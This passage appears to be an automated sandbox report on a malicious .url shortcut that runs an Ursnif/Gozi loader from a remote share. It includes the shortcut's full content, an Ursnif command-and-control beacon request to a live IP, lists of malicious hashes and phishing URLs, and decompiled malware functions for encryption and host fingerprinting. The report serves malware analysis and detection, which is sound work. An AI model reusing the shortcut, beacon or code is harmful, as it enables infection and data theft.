Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MGNHOST-ASRU	login.dll	Get hash	malicious	Ursnif	Browse	194.116.163.130
	login.dll	Get hash	malicious	Ursnif	Browse	194.116.163.130
	Informazion.exe	Get hash	malicious	Ursnif, zgRAT	Browse	193.0.178.157
	47gcdr4nlI.exe	Get hash	malicious	DanaBot	Browse	185.142.98.118
	fx1sA5uEA6.dll	Get hash	malicious	Ursnif	Browse	45.128.184.132
	l86WZsZuFv.dll	Get hash	malicious	Ursnif	Browse	45.128.184.132
	ksbpxIpTBF.exe	Get hash	malicious	Ursnif	Browse	45.128.184.132
	sYYcKwk74U.exe	Get hash	malicious	Ursnif	Browse	45.128.184.132
	8cM8CHCI8G.exe	Get hash	malicious	Ursnif	Browse	45.128.184.132
	RhVUkWJKWL.exe	Get hash	malicious	Ursnif	Browse	45.128.184.132
	94nN5FYKPp.exe	Get hash	malicious	Ursnif	Browse	45.128.184.132
	5wh5H82cKl.exe	Get hash	malicious	Ursnif	Browse	45.128.184.132
	readme.dll	Get hash	malicious	Ursnif CryptOne	Browse	45.128.184.132
	readme.dll	Get hash	malicious	Ursnif CryptOne	Browse	45.128.184.132
	readme.dll	Get hash	malicious	Ursnif CryptOne	Browse	45.128.184.132
	status.dll	Get hash	malicious	Ursnif CryptOne	Browse	45.128.184.132
	readme.dll	Get hash	malicious	Ursnif CryptOne	Browse	45.128.184.132
	status.dll	Get hash	malicious	Ursnif	Browse	45.128.184.132
	IWmwEgXhMK.exe	Get hash	malicious	Ursnif	Browse	45.128.184.132
	book.exe	Get hash	malicious	Ursnif	Browse	45.128.184.132
EDGECASTUS	Qui2.html	Get hash	malicious	HtmlDropper	Browse	192.229.221.95
	Qui.html	Get hash	malicious	HtmlDropper	Browse	192.229.221.95
	http://www.nhssecure.net/get_resource.asp?cid=74071a673307ca7459bcf75fbd024e09&id=205d7c9d0e7a7baad7d8608b91fcdbe5	Get hash	malicious	Unknown	Browse	192.229.221.95
	I'nvoice-239124.HTM	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	Veniam.html	Get hash	malicious	HtmlDropper	Browse	192.229.221.95
	Hic.html	Get hash	malicious	HtmlDropper	Browse	192.229.221.95
	PO-465514-180820.doc.zip	Get hash	malicious	Unknown	Browse	192.229.221.95
	ATT9873645.htm	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://zsyqplxqhppbvzsqnfap7te6tabckg3sq3wfqkmbjymzhvyu-ipfs-dweb-link.translate.goog/alldomail.html?_x_tr_hp=bafybeibmec&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#test@test.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsites.google.com%2fview%2fjohnston-shopfitterscom%2fhome&c=E,1,3vcZJt3u3RweBgq6dxyWc2_Z7McrcDgw3JG2EWjR2_FbAKKqj9TpaTWQ28bphvNd553v_wUTX8OaFyNWrvI0_3ADN5d2SgiKJpOYTs3MemGZDP_Cbeae&typo=1	Get hash	malicious	HTMLPhisher	Browse	93.184.216.34
	ATT002123432.htm	Get hash	malicious	HTMLPhisher	Browse	192.229.221.185
	Dolorem.html	Get hash	malicious	HtmlDropper	Browse	192.229.221.95
	Roquette Financial Policy.html	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	Contract202303.doc	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://aftral.entura.com.pe	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	Praesentium.html	Get hash	malicious	HtmlDropper	Browse	192.229.221.95
	https://www.newsbreakmail.com/redirect/aHR0cHM6Ly9waXczbW92c3ZtNjNkYzY1MDUxYmE2Ni54aW5odWF3ZWkucnUvTWNtUmhiV0YwYjBCaWNuZHVZMkZzWkM1amIyMD0=	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	dominos.com.my Expired Password Notification.msg	Get hash	malicious	Unknown	Browse	192.229.221.95
	#U260eaudio000Rec.htm	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	694c17d75e085701e022b3546c5f8d60ba741bfebff48e535abba4bc652aaa3e.zip	Get hash	malicious	Emotet	Browse	192.229.221.95

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_13929_20386-20230315T1230440507-6104.etl

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.252651136206788
Encrypted:	false
SSDEEP:	48:Y4wW6WQUOiWwNHxaUJ3EdJ7mh9HP/XOky96BexvkafzwSGDMh1KTCB382ERQFNqs:Y4wiARUOAPg7K6erUPtnEiZwiFDv
MD5:	B8BA6B7187B954175903A42227D0D074
SHA1:	C8CCE7F52C0AE82D5491D8068898F84D61BE72CD
SHA-256:	3FC29469CA7B7E2D992FE4F773E31E961D7A0138034CD4B354A20F099C084015
SHA-512:	15908F1B0FDEF892B22AB80F598BBD1242B8CB9E0397715AD1BA47E493A56734D9EABDDDDF7431C08B730EA62A51E7CB4FBEE80E940D83CC34852109D2AF9632
Malicious:	false
Reputation:	low
Preview:	........@.........X.1W..(........................... ...8.(......+......X..................1W..#.....C.L...0T.j................V.F.........................):X..................1W..#.....C.L...0T.j...............]^.F.........................':X..................1W..#.....C.L...0T.j................d.F.........................(:X..................1W..#.....C.L...0T.j...............1i.F.........................&:X..................1W..#.....C.L...0T.j................n.F.........................:X..................1W..#.....C.L...0T.j................r.F.........................c:X..................1W..#.....C.L...0T.j................w.F........................._:X..................1W..#.....C.L...0T.j...............E\|.F.........................b:X..................1W..#.....C.L...0T.j.................F.........................`:X..................1W..#.....C.L...0T.j...............)..F.........................a:X..................1W..#.....C.L...0T.j.......

C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.xml

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	XML 1.0 document, ASCII text, with very long lines (424), with CRLF line terminators
Category:	modified
Size (bytes):	1596
Entropy (8bit):	4.637608585062843
Encrypted:	false
SSDEEP:	24:3zNOB9IGVPF9o/WgHOfH176h9Ga5UiGPF9o/WgHOfH1KdR4Mfa4:DNcCGF9o/ufV76jryF9o/ufVKT
MD5:	05C75784B643BF3D900ECA7142449F49
SHA1:	2763DC3D4C243EF1E7BDB54EBAEC3DF3DE9D5B5D
SHA-256:	7290D05C07B3DDF1189C8CF30E64122E03DF51C2A8332FAF1060100CF8932D70
SHA-512:	4EF65759299F291EA0AE6F808CAF002A8FF570075E5EF35FE5D6863AB3A52B7A056AFEFE8D12DE5A2433DDA8EC51E876767492E0526A205A62B04E78133A6D49
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0"?>..<wundbar>...<initMail>1</initMail>...<initShortcuts>1</initShortcuts>...<version>1613929</version>...<dataversion>1202</dataversion>...<stores>....<storeblock>.....<eidstore>0000000038A1BB1005E5101AA1BB08002B2A56C200006D737073742E646C6C00000000004E495441F9BFB80100AA0037D96E0000000043003A005C00550073006500720073005C0061006C0066007200650064006F005C0044006F00630075006D0065006E00740073005C004F00750074006C006F006F006B002000460069006C00650073005C004F00750074006C006F006F006B00200044006100740061002000460069006C00650020002D0020004E006F0045006D00610069006C002E007000730074000000</eidstore>.....<storeid>0</storeid>.....<crawledIn12>1</crawledIn12>....</storeblock>...</stores>...<userdefined>....<linkgroup name="Shortcuts" clsid="F01F40A0D5668A48AA01551BB46FA468">.....<wdLnk>......<ltype>shortcut</ltype>......<storeid>0</storeid>......<icondata/>......<reckey>DB534562B7845545954A1594721BD1D6</reckey>......<eid>0000000038A1BB1005E5101AA1BB08002B2A56C200006D737073742E646C6C0000

C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	6694
Entropy (8bit):	1.872940016765219
Encrypted:	false
SSDEEP:	24:KI+ZiNEXTwIrlcNJKgsFMhaUAbYh9EO9O48xP4TKn+ZhmKEpZFq+cnT3/k6vq+5z:K/MIWKfg2aVk1t4TKvjQ3Mg
MD5:	C9175FCB9AE1728759F63A4951D61701
SHA1:	37359EAF4FFA4370EC46323C90EF327ABB282F76
SHA-256:	CEBF4CEA7D9A7C055FB38C9EAE31A136A701CC5727D472D13C29F2C3BD0AF368
SHA-512:	2538518B90658CD9132569712C21ED7AD5B820647F70F0640533F79A21E5B5E9E14128FCBB52AD07B92A5CD3E17E80162D1740B080F037C8854E6C798402A286
Malicious:	false
Reputation:	low
Preview:	.................X..............................................................&...............D...................................................................................................................................................................................................................................................................................................................................................................................................................7.........D.......................`.......................d........(......b.......j........I...... ................y......r.......T.......@...............x........s......D.......\|.......................@.......@.......n.......D........x..............................T...............@`......................................................................@u......V...............@.......................@.......................@........................=......n................K...... ...............

Static File Info

General

File type:	MS Windows 95 Internet shortcut text (URL=<file://46.8.19.120/Agenzia/server.exe>), ASCII text, with CRLF line terminators
Entropy (8bit):	5.238475343799848
TrID:	Windows URL shortcut (11001/1) 91.66% Generic INI configuration (1001/1) 8.34%
File name:	marzo.txt.url
File size:	192
MD5:	d8dc17b22192b297073d5749a7b49966
SHA1:	606fd516fb85a0fbaa3a2b7ea92feffd5ae41b99
SHA256:	f7b7f524138f10ad3b0d8145997db4ee5c90e7d8f76281cfc4a32bc427833236
SHA512:	cce016c592afc7903143ec6891d364830ef869b13abb912d267a27270fa1701f2d1e1c86794c47f85095f9e7c14e250787cf1aa2b6c179aff8cc0bcda6918349
SSDEEP:	3:HRAbABGQEb/5sQaGSXZYj8XkAoIvycAI9RyJ25YdimVVG/VClAWHyn:HRYFJb/5sZGgYj8UNIvyc1yc54vVG/4c
TLSH:	32C022044A0E8077C142440A8058BC58A90EB0581CEFC83822C5D987BC804C1CD08ABA
File Content Preview:	[InternetShortcut]..IconIndex=70..HotKey=0..IDList=..URL=file://46.8.19.120/Agenzia/server.exe..IconFile=C:\Windows\system32\SHELL32.dll..[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,9..

File Icon


Icon Hash:	64e0e4e4e4e9e1ed

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.35.44.43.1749733802033203 03/15/23-12:33:08.360785	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49733	80	192.168.2.3	5.44.43.17
192.168.2.35.44.43.1749733802033204 03/15/23-12:33:08.360785	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49733	80	192.168.2.3	5.44.43.17

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 15, 2023 12:31:38.167218924 CET	80	49705	192.229.221.95	192.168.2.3
Mar 15, 2023 12:31:38.169547081 CET	49705	80	192.168.2.3	192.229.221.95
Mar 15, 2023 12:31:45.872168064 CET	80	49720	192.229.221.95	192.168.2.3
Mar 15, 2023 12:31:45.872308969 CET	49720	80	192.168.2.3	192.229.221.95
Mar 15, 2023 12:31:48.039853096 CET	80	49727	192.229.221.95	192.168.2.3
Mar 15, 2023 12:31:48.040059090 CET	49727	80	192.168.2.3	192.229.221.95
Mar 15, 2023 12:32:03.663597107 CET	49727	80	192.168.2.3	192.229.221.95
Mar 15, 2023 12:32:39.607276917 CET	80	49705	192.229.221.95	192.168.2.3
Mar 15, 2023 12:32:39.607542992 CET	49705	80	192.168.2.3	192.229.221.95
Mar 15, 2023 12:32:41.122843027 CET	49720	80	192.168.2.3	192.229.221.95
Mar 15, 2023 12:32:41.141417980 CET	80	49720	192.229.221.95	192.168.2.3
Mar 15, 2023 12:32:41.142498970 CET	49720	80	192.168.2.3	192.229.221.95
Mar 15, 2023 12:33:08.308319092 CET	49733	80	192.168.2.3	5.44.43.17
Mar 15, 2023 12:33:08.360223055 CET	80	49733	5.44.43.17	192.168.2.3
Mar 15, 2023 12:33:08.360382080 CET	49733	80	192.168.2.3	5.44.43.17
Mar 15, 2023 12:33:08.360785007 CET	49733	80	192.168.2.3	5.44.43.17
Mar 15, 2023 12:33:08.413362026 CET	80	49733	5.44.43.17	192.168.2.3
Mar 15, 2023 12:33:08.414658070 CET	80	49733	5.44.43.17	192.168.2.3
Mar 15, 2023 12:33:08.414844036 CET	49733	80	192.168.2.3	5.44.43.17
Mar 15, 2023 12:33:08.415833950 CET	49733	80	192.168.2.3	5.44.43.17
Mar 15, 2023 12:33:08.467634916 CET	80	49733	5.44.43.17	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 15, 2023 12:31:48.190037012 CET	52342	53	192.168.2.3	1.1.1.1
Mar 15, 2023 12:31:48.219518900 CET	53	52342	1.1.1.1	192.168.2.3
Mar 15, 2023 12:33:03.584960938 CET	60583	53	192.168.2.3	1.1.1.1
Mar 15, 2023 12:33:03.605824947 CET	53	60583	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 15, 2023 12:31:48.190037012 CET	192.168.2.3	1.1.1.1	0xc3af	Standard query (0)	checklist.skype.com	A (IP address)	IN (0x0001)	false
Mar 15, 2023 12:33:03.584960938 CET	192.168.2.3	1.1.1.1	0x6b45	Standard query (0)	checklist.skype.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 15, 2023 12:31:48.219518900 CET	1.1.1.1	192.168.2.3	0xc3af	Name error (3)	checklist.skype.com	none	none	A (IP address)	IN (0x0001)	false
Mar 15, 2023 12:33:03.605824947 CET	1.1.1.1	192.168.2.3	0x6b45	Name error (3)	checklist.skype.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

5.44.43.17

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49733	5.44.43.17	80	\Device\Mup\46.8.19.120\Agenzia\server.exe

Timestamp	kBytes transferred	Direction	Data
Mar 15, 2023 12:33:08.360785007 CET	1220	OUT	GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 5.44.43.17 Connection: Keep-Alive Cache-Control: no-cache

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: OUTLOOK.EXEPID: 6104, Parent PID: -1

General

Target ID:	0
Start time:	12:30:59
Start date:	15/03/2023
Path:	C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail
Imagebase:	0x7ff686560000
File size:	41778000 bytes
MD5 hash:	CA3FDE8329DE07C95897DB0D828545CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: server.exePID: 6612, Parent PID: 3840

General

Target ID:	3
Start time:	12:31:17
Start date:	15/03/2023
Path:	\Device\Mup\46.8.19.120\Agenzia\server.exe
Wow64 process (32bit):	true
Commandline:	"\\46.8.19.120\Agenzia\server.exe"
Imagebase:	0x400000
File size:	316928 bytes
MD5 hash:	C29870BA33B8691967B100BC30572BB7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: server.exePID: 6832, Parent PID: 3840

General

Target ID:	5
Start time:	12:32:13
Start date:	15/03/2023
Path:	\Device\Mup\46.8.19.120\Agenzia\server.exe
Wow64 process (32bit):	true
Commandline:	"\\46.8.19.120\Agenzia\server.exe"
Imagebase:	0x400000
File size:	316928 bytes
MD5 hash:	C29870BA33B8691967B100BC30572BB7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: server.exePID: 6612, Parent PID: 3840COMMON

Executed Functions

Function 02B81508 Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E02B81508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x2b8a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x2b8a0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E02B833DC(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x2b8a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x2b8a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E02B861DA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x02b81511
0x02b81517
0x02b8151a
0x02b81520
0x02b81520
0x02b81522
0x02b81524
0x02b81527
0x02b8152d
0x02b8152e
0x02b8152f
0x02b81535
0x02b8153a
0x02b81540
0x02b81548
0x02b816a5
0x02b8154e
0x02b81550
0x02b81559
0x02b8155e
0x02b81570
0x02b81573
0x02b81577
0x02b8157e
0x02b81582
0x02b8158a
0x02b81690
0x02b81590
0x02b81590
0x02b81594
0x02b81595
0x02b81597
0x02b815a2
0x02b8167c
0x02b815a8
0x02b815a8
0x02b815ab
0x02b815b1
0x02b815b7
0x02b815b7
0x02b815bf
0x02b815c1
0x02b815c6
0x02b8166d
0x02b815cc
0x02b815d2
0x02b815d5
0x02b815d8
0x02b815da
0x02b815db
0x02b815e0
0x02b815e2
0x02b815e2
0x02b815ec
0x02b815f1
0x02b815f4
0x02b815f7
0x02b815f9
0x02b81602
0x02b8162c
0x02b81604
0x02b81615
0x02b81615
0x02b81634
0x00000000
0x00000000
0x02b81636
0x02b81639
0x02b8163c
0x02b81640
0x00000000
0x02b81642
0x02b81651
0x02b81657
0x02b8165f
0x02b8165f
0x00000000
0x02b81640
0x02b81644
0x02b8164a
0x02b8164f
0x02b81666
0x00000000
0x00000000
0x00000000
0x02b8164f
0x02b815c6
0x02b8167f
0x02b81682
0x02b81682
0x02b81697
0x02b81697
0x02b816af

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02B85088,00000001,02B83ECE,00000000), ref: 02B81540
memcpy.NTDLL(02B85088,02B83ECE,00000010,?,?,?,02B85088,00000001,02B83ECE,00000000,?,02B866D9,00000000,02B83ECE,?,7625E910), ref: 02B81559
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02B81582
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02B8159A
memcpy.NTDLL(00000000,7625E910,05589610,00000010), ref: 02B815EC
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05589610,00000020,?,?,00000010), ref: 02B81615
GetLastError.KERNEL32(?,?,00000010), ref: 02B81644
GetLastError.KERNEL32 ref: 02B81676
CryptDestroyKey.ADVAPI32(00000000), ref: 02B81682
GetLastError.KERNEL32 ref: 02B8168A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02B81697
GetLastError.KERNEL32(?,?,?,02B85088,00000001,02B83ECE,00000000,?,02B866D9,00000000,02B83ECE,?,7625E910,02B83ECE,00000000,05589610), ref: 02B8169F

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID:
API String ID: 3401600162-0
Opcode ID: cb74b0322127e60612f28ae21bc92d94cc52a2e9cbb4e611bf07bda88a99c7c3
Instruction ID: 43aeff7e739def0a675687ce94f94d5a5bbff6ecad58bbe031638d8b1d84e9b2
Opcode Fuzzy Hash: cb74b0322127e60612f28ae21bc92d94cc52a2e9cbb4e611bf07bda88a99c7c3
Instruction Fuzzy Hash: F0514BB1911209EFDF10EFA8DC84AAE7BB9FB08340F148869F95DE7240D7748A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B83BD3 Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E02B83BD3(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2b8a310; // 0x7aca9d57
					_v12 = _t59;
				}
				_t64 = _t69;
				E02B871CD( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2b8a344 ^ 0x6c7261ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2b8a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02B856B9(_v8 + _v8, _t64);
							}
							HeapFree( *0x2b8a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2b8a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02B856B9(_v8 + _v8, _t64);
						}
						HeapFree( *0x2b8a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02b83bd3
0x02b83bdb
0x02b83bdf
0x02b83be2
0x02b83be7
0x02b83be9
0x02b83bee
0x02b83bee
0x02b83bf4
0x02b83bf6
0x02b83c03
0x02b83c64
0x02b83c05
0x02b83c0a
0x02b83c10
0x02b83c15
0x02b83c23
0x02b83c27
0x02b83c36
0x02b83c3d
0x02b83c44
0x02b83c44
0x02b83c4f
0x02b83c4f
0x02b83c27
0x02b83c15
0x02b83c66
0x02b83c6c
0x02b83c76
0x02b83c78
0x02b83c7d
0x02b83c8c
0x02b83c90
0x02b83c9b
0x02b83ca2
0x02b83ca9
0x02b83ca9
0x02b83cb5
0x02b83cb5
0x02b83c90
0x02b83cc0
0x02b83cc2
0x02b83cc5
0x02b83cc7
0x02b83cca
0x02b83ccd
0x02b83cd7
0x02b83cdb
0x02b83cdf

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02B83C0A
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B83C21
GetUserNameW.ADVAPI32(00000000,?), ref: 02B83C2E
HeapFree.KERNEL32(00000000,00000000), ref: 02B83C4F
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02B83C76
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B83C8A
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02B83C97
HeapFree.KERNEL32(00000000,00000000), ref: 02B83CB5

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
